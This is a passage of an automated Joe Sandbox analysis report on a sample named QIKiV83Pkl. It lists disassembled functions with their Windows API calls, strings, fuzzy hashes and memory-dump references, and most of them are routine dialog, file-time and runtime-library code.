                • Opcode Fuzzy Hash: ad590153e46dc127ec9322a9df2d4dfdd520a7537b1d6bff7bc8761f8624080b
                • Instruction Fuzzy Hash: EC51AE315083A54EC712CF28918456EFFE1FEEA214F4988DEE4E98B217D230D649CB93
                Function 0087F968 Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75dd8333d5d0cf86e1abcd6ee312d269315abe84277aea414d764f5e340d1547
                • Instruction ID: 616ef30074b4c8c31303c05099789341fc114d22b71d84a9536e5344dffa8576
                • Opcode Fuzzy Hash: 75dd8333d5d0cf86e1abcd6ee312d269315abe84277aea414d764f5e340d1547
                • Instruction Fuzzy Hash: CB514571A083168BC748CF19D48059AF7E1FFC8354F058A2EE899E3741DB34EA59CB96
                Function 008837C1 Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: dc8ff59b3d4d97795ac83f2427479afadccb35e374d6c58e33463847c0ffca12
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: 8B31D3B16047498FCB18EF28C85126EBBE0FB95700F10892DE4D9C7742C779EA49CB92
                Function 00875F3C Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7b3f98e3cc9e9c91e503fa469e1f696285d78e06c9febf6473e2db2abb5572b
                • Instruction ID: d29615f50b840be37015d8454e378388fcc6ac107a7376edea73c8893adb5d18
                • Opcode Fuzzy Hash: f7b3f98e3cc9e9c91e503fa469e1f696285d78e06c9febf6473e2db2abb5572b
                • Instruction Fuzzy Hash: BC21C232A205614BCB48CF2DECE087A7751F78B311746C22BEA46DB6D5C935E925CBA0
                Function 0087DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                Download Yara Rule
                APIs
                • _swprintf.LIBCMT ref: 0087DABE
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                  • Part of subcall function 00881596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008B0EE8,00000200,0087D202,00000000,?,00000050,008B0EE8), ref: 008815B3
                • _strlen.LIBCMT ref: 0087DADF
                • SetDlgItemTextW.USER32(?,008AE154,?), ref: 0087DB3F
                • GetWindowRect.USER32(?,?), ref: 0087DB79
                • GetClientRect.USER32(?,?), ref: 0087DB85
                • GetWindowLongW.USER32(?,000000F0), ref: 0087DC25
                • GetWindowRect.USER32(?,?), ref: 0087DC52
                • SetWindowTextW.USER32(?,?), ref: 0087DC95
                • GetSystemMetrics.USER32(00000008), ref: 0087DC9D
                • GetWindow.USER32(?,00000005), ref: 0087DCA8
                • GetWindowRect.USER32(00000000,?), ref: 0087DCD5
                • GetWindow.USER32(00000000,00000002), ref: 0087DD47
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d
                • API String ID: 2407758923-2512411981
                • Opcode ID: 71c05769fad47b9103880a7210f55192dd95949be5ccdda67715c27f26b90236
                • Instruction ID: 0dac5420d973466b6bd746ab367f2b2510219d63c28f34d0eafe8cfba1044157
                • Opcode Fuzzy Hash: 71c05769fad47b9103880a7210f55192dd95949be5ccdda67715c27f26b90236
                • Instruction Fuzzy Hash: 2C818C72108301AFD711DF68CD89A6BBBF9FF89704F04891DFA89D3295D670E9098B52
                Function 0089C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0089C277
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE2F
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE41
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE53
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE65
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE77
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE89
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE9B
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEAD
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEBF
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BED1
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEE3
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEF5
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BF07
                • _free.LIBCMT ref: 0089C26C
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089C28E
                • _free.LIBCMT ref: 0089C2A3
                • _free.LIBCMT ref: 0089C2AE
                • _free.LIBCMT ref: 0089C2D0
                • _free.LIBCMT ref: 0089C2E3
                • _free.LIBCMT ref: 0089C2F1
                • _free.LIBCMT ref: 0089C2FC
                • _free.LIBCMT ref: 0089C334
                • _free.LIBCMT ref: 0089C33B
                • _free.LIBCMT ref: 0089C358
                • _free.LIBCMT ref: 0089C370
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 3d03d6aa32a09f5c2743c19450a90728e1804911a228bd6935f1b5ef4f93ab46
                • Instruction ID: 2e8d287e2758e89ff48da1984464bad4f5f4b5ed17011d86f761a34314c890a0
                • Opcode Fuzzy Hash: 3d03d6aa32a09f5c2743c19450a90728e1804911a228bd6935f1b5ef4f93ab46
                • Instruction Fuzzy Hash: C6316B32600206DFEF20BBB8D945B5A73E9FF02310F198469E449D7A51DE32FC409A25
                Function 0088CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                Download Yara Rule
                APIs
                • GetWindow.USER32(?,00000005), ref: 0088CD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 0088CD7D
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 0088CD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088CDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0088CDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088CDED
                • DeleteObject.GDI32(00000000), ref: 0088CDF4
                • GetWindow.USER32(00000000,00000002), ref: 0088CDFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: 90ae423857ca62ed4566808f94aa9089dee2e91f64ea58428d84c7c2c36d5643
                • Instruction ID: a6a57c68e1436f9bd374b952f35153d75dead5abb3d88147aea6278a4218dcc2
                • Opcode Fuzzy Hash: 90ae423857ca62ed4566808f94aa9089dee2e91f64ea58428d84c7c2c36d5643
                • Instruction Fuzzy Hash: E01136321427117BE7217B24DC0AFAF775CFF61741F008122FA42E10A2DA748D1687B5
                Function 00898EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00898EC5
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 00898ED1
                • _free.LIBCMT ref: 00898EDC
                • _free.LIBCMT ref: 00898EE7
                • _free.LIBCMT ref: 00898EF2
                • _free.LIBCMT ref: 00898EFD
                • _free.LIBCMT ref: 00898F08
                • _free.LIBCMT ref: 00898F13
                • _free.LIBCMT ref: 00898F1E
                • _free.LIBCMT ref: 00898F2C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 31ba13765f33591e688dcb672e8970939a4277f49bb1b859a1bee7cb5e3e8cea
                • Instruction ID: 3cbce6aa2585942c4f71ab4eb66611be6a95dfed39507a5313a91fa2a5dc9ca3
                • Opcode Fuzzy Hash: 31ba13765f33591e688dcb672e8970939a4277f49bb1b859a1bee7cb5e3e8cea
                • Instruction Fuzzy Hash: A811A77650010EEFCF11FF58C842CDA3B65FF05350B5A40E5BA088B926DA31EA519F85
                Function 00872162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: 056ac3677a48bcf2173da5d6fe48276d392d0bae4beb57da9e149844e870077b
                • Instruction ID: f12dd56bff89298d668f268ee763db3c42a23ab00889220e1aefab8c93a3149b
                • Opcode Fuzzy Hash: 056ac3677a48bcf2173da5d6fe48276d392d0bae4beb57da9e149844e870077b
                • Instruction Fuzzy Hash: 2CF117716042405BDB15EE2888D5BEA7799FFA0340F08C56DF98DCB29BDA24D948C7A3
                Function 0088ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088AD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0088AD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0088AD60
                • SetWindowTextW.USER32(?,?), ref: 0088AD71
                • GetDlgItem.USER32(?,00000065), ref: 0088AD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0088AD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0088ADA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: adb2a99a12fed1d19e1f76e55f03e27e49b6fb2638e43a7af1a71a8e74b745dc
                • Instruction ID: af837210efeb34fcb561f97684a313a7dece29750de503ed1f07ea7758675aac
                • Opcode Fuzzy Hash: adb2a99a12fed1d19e1f76e55f03e27e49b6fb2638e43a7af1a71a8e74b745dc
                • Instruction Fuzzy Hash: 0221AD32241205BBE6257B25EC49E3B3B7CFB5AB46F014116F604E24E0DA66AD00E732
                Function 00879443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00879448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0087946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0087948A
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • _swprintf.LIBCMT ref: 00879526
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • MoveFileW.KERNEL32(?,?), ref: 00879595
                • MoveFileW.KERNEL32(?,?), ref: 008795D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: 99e8be2e7e240b6fb825904a6eb1821839897998967397f39172eff37e9077d9
                • Instruction ID: bba8aa9fd60799563f617b3b3f874f13866785f1c034e32d7d8cac53cdbca219
                • Opcode Fuzzy Hash: 99e8be2e7e240b6fb825904a6eb1821839897998967397f39172eff37e9077d9
                • Instruction Fuzzy Hash: 7A414D71900258A6DF20EBA88C85EDA737CFF51380F0485E5F59DE304AEB74CB898B65
                Function 00880A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                Download Yara Rule
                APIs
                • __aulldiv.LIBCMT ref: 00880A9D
                  • Part of subcall function 0087ACF5: GetVersionExW.KERNEL32(?), ref: 0087AD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00880AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00880AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00880AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00880B3D
                • __aullrem.LIBCMT ref: 00880BCB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 20d38c8ec319e39e2b2083c19ad3f6bf7e6e2f11dc9a4a4c01edfdf260d3a8f7
                • Instruction ID: 0b9a98cce58e4aedda9264c874cd0f6a1b28664cff8e6161661872d8eea18c2e
                • Opcode Fuzzy Hash: 20d38c8ec319e39e2b2083c19ad3f6bf7e6e2f11dc9a4a4c01edfdf260d3a8f7
                • Instruction Fuzzy Hash: F64116B1408306AFD354DF64C88096BBBE8FF88714F004A2EF596D2650E778E549CB52
                Function 0089EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0089F5A2,?,00000000,?,00000000,00000000), ref: 0089EE6F
                • __fassign.LIBCMT ref: 0089EEEA
                • __fassign.LIBCMT ref: 0089EF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0089EF2B
                • WriteFile.KERNEL32(?,?,00000000,0089F5A2,00000000,?,?,?,?,?,?,?,?,?,0089F5A2,?), ref: 0089EF4A
                • WriteFile.KERNEL32(?,?,00000001,0089F5A2,00000000,?,?,?,?,?,?,?,?,?,0089F5A2,?), ref: 0089EF83
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: eed37f78e287899ea68ca7b26b7eeeca96103fb34df926f14853bb67c90c5146
                • Instruction ID: 9e8a96c3595c7aa24143c9be151d97d8fcde28465bfe90904336f7ec5484987d
                • Opcode Fuzzy Hash: eed37f78e287899ea68ca7b26b7eeeca96103fb34df926f14853bb67c90c5146
                • Instruction Fuzzy Hash: 8051B170A00209AFDF10DFA8DC45AEEBBF9FF09300F18455AE555E7691DB309940CB61
                Function 0088C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                Download Yara Rule
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 0088C54A
                • _swprintf.LIBCMT ref: 0088C57E
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • SetDlgItemTextW.USER32(?,00000066,008B946A), ref: 0088C59E
                • _wcschr.LIBVCRUNTIME ref: 0088C5D1
                • EndDialog.USER32(?,00000001), ref: 0088C6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 62520cb41402906f74c6544f893079ca842dce7b7ee944d9638e6ff83d7be0d4
                • Instruction ID: 2df4beda12f77391977634830dc5df6639cc1554e3e5dca83f94d7ccf90b8dd5
                • Opcode Fuzzy Hash: 62520cb41402906f74c6544f893079ca842dce7b7ee944d9638e6ff83d7be0d4
                • Instruction Fuzzy Hash: AA41C171D00618AADF26EBA4DC45EEA77BDFF18305F0080A6E509E7065E7719BC4CB61
                Function 00888E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                Download Yara Rule
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00888F38
